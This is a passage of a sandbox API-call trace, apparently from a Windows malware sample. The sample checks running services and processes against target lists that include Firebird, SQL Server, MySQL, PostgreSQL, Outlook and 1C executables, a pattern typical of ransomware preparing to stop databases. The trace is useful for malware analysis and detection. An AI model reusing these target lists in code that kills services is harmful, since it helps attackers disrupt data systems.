[0031.742] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0031.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0031.742] lstrlenW (lpString="CscService") returned 10 [0031.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0031.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0031.742] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0031.742] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0031.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0031.742] lstrlenW (lpString="DcomLaunch") returned 10 [0031.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.742] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0031.742] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0031.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0031.742] lstrlenW (lpString="Dhcp") returned 4 [0031.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0031.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0031.743] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0031.743] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0031.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0031.743] lstrlenW (lpString="Dnscache") returned 8 [0031.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0031.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0031.743] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0031.743] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0031.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0031.743] lstrlenW (lpString="DPS") returned 3 [0031.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0031.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0031.743] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0031.743] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0031.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0031.743] lstrlenW (lpString="eventlog") returned 8 [0031.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0031.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0031.743] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0031.743] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0031.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0031.743] lstrlenW (lpString="EventSystem") returned 11 [0031.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0031.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0031.743] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0031.743] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0031.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0031.743] lstrlenW (lpString="gpsvc") returned 5 [0031.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0031.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0031.743] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0031.744] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0031.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0031.744] lstrlenW (lpString="iphlpsvc") returned 8 [0031.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.744] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0031.744] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0031.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0031.744] lstrlenW (lpString="LanmanServer") returned 12 [0031.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0031.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0031.744] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0031.744] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0031.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0031.744] lstrlenW (lpString="LanmanWorkstation") returned 17 [0031.744] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.744] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.744] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0031.744] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0031.744] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0031.745] lstrlenW (lpString="lmhosts") returned 7 [0031.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0031.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0031.745] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0031.745] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0031.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0031.745] lstrlenW (lpString="MMCSS") returned 5 [0031.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0031.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0031.745] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0031.745] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0031.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0031.745] lstrlenW (lpString="MpsSvc") returned 6 [0031.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0031.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0031.745] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0031.745] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0031.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0031.745] lstrlenW (lpString="Netman") returned 6 [0031.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0031.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0031.745] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0031.745] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0031.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0031.745] lstrlenW (lpString="netprofm") returned 8 [0031.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0031.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0031.745] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0031.745] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0031.745] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0031.745] lstrlenW (lpString="NlaSvc") returned 6 [0031.745] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0031.745] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0031.746] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0031.746] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0031.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0031.746] lstrlenW (lpString="nsi") returned 3 [0031.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0031.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0031.746] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0031.746] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0031.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0031.746] lstrlenW (lpString="PcaSvc") returned 6 [0031.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0031.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0031.746] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0031.746] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0031.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0031.746] lstrlenW (lpString="PlugPlay") returned 8 [0031.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0031.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0031.746] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0031.746] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0031.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0031.746] lstrlenW (lpString="Power") returned 5 [0031.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0031.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0031.746] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0031.746] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0031.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0031.746] lstrlenW (lpString="ProfSvc") returned 7 [0031.746] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0031.746] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0031.746] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0031.746] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0031.746] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0031.747] lstrlenW (lpString="RpcEptMapper") returned 12 [0031.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.747] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0031.747] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0031.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0031.747] lstrlenW (lpString="RpcSs") returned 5 [0031.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0031.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0031.747] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0031.747] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0031.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0031.747] lstrlenW (lpString="SamSs") returned 5 [0031.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0031.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0031.747] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0031.747] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0031.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0031.747] lstrlenW (lpString="Schedule") returned 8 [0031.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0031.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0031.747] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0031.747] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0031.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0031.747] lstrlenW (lpString="SENS") returned 4 [0031.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0031.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0031.747] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0031.747] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0031.747] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0031.747] lstrlenW (lpString="ShellHWDetection") returned 16 [0031.747] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.747] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.748] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0031.748] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0031.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0031.748] lstrlenW (lpString="Spooler") returned 7 [0031.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0031.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0031.748] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0031.748] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0031.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0031.748] lstrlenW (lpString="SysMain") returned 7 [0031.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0031.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0031.748] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0031.748] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0031.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0031.748] lstrlenW (lpString="Themes") returned 6 [0031.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0031.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0031.748] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0031.748] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0031.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0031.748] lstrlenW (lpString="TrkWks") returned 6 [0031.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0031.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0031.748] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0031.748] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0031.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0031.748] lstrlenW (lpString="UxSms") returned 5 [0031.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0031.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0031.748] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0031.748] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0031.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0031.749] lstrlenW (lpString="WdiServiceHost") returned 14 [0031.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.749] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0031.749] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0031.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0031.749] lstrlenW (lpString="WdiSystemHost") returned 13 [0031.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.749] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0031.749] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0031.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0031.749] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0031.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.749] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0031.749] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0031.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0031.749] lstrlenW (lpString="Winmgmt") returned 7 [0031.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0031.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0031.749] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0031.749] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0031.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0031.749] lstrlenW (lpString="WPDBusEnum") returned 10 [0031.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.749] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0031.749] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0031.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0031.749] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65e4a0 | out: hHeap=0x5f0000) returned 1 [0031.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x118 [0031.752] Process32FirstW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0031.753] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0031.753] lstrlenW (lpString="System") returned 6 [0031.753] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0031.753] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0031.753] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0031.753] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0031.753] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0031.754] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0031.754] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0031.754] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0031.754] lstrlenW (lpString="smss.exe") returned 8 [0031.754] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0031.754] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0031.754] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0031.754] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0031.754] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0031.754] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0031.754] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0031.754] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.755] lstrlenW (lpString="csrss.exe") returned 9 [0031.755] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.755] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.755] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.755] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.755] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.755] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.755] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0031.755] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0031.756] lstrlenW (lpString="wininit.exe") returned 11 [0031.756] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0031.756] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0031.756] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0031.756] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0031.756] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0031.756] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0031.756] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0031.756] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.757] lstrlenW (lpString="csrss.exe") returned 9 [0031.757] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.757] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.757] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.757] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.757] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.757] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.757] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0031.758] lstrlenW (lpString="winlogon.exe") returned 12 [0031.758] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0031.758] lstrlenW (lpString="services.exe") returned 12 [0031.758] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0031.759] lstrlenW (lpString="lsass.exe") returned 9 [0031.759] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0031.759] lstrlenW (lpString="lsm.exe") returned 7 [0031.759] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.761] lstrlenW (lpString="svchost.exe") returned 11 [0031.761] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.762] lstrlenW (lpString="svchost.exe") returned 11 [0031.762] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.763] lstrlenW (lpString="svchost.exe") returned 11 [0031.763] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.763] lstrlenW (lpString="svchost.exe") returned 11 [0031.763] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.764] lstrlenW (lpString="svchost.exe") returned 11 [0031.764] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, 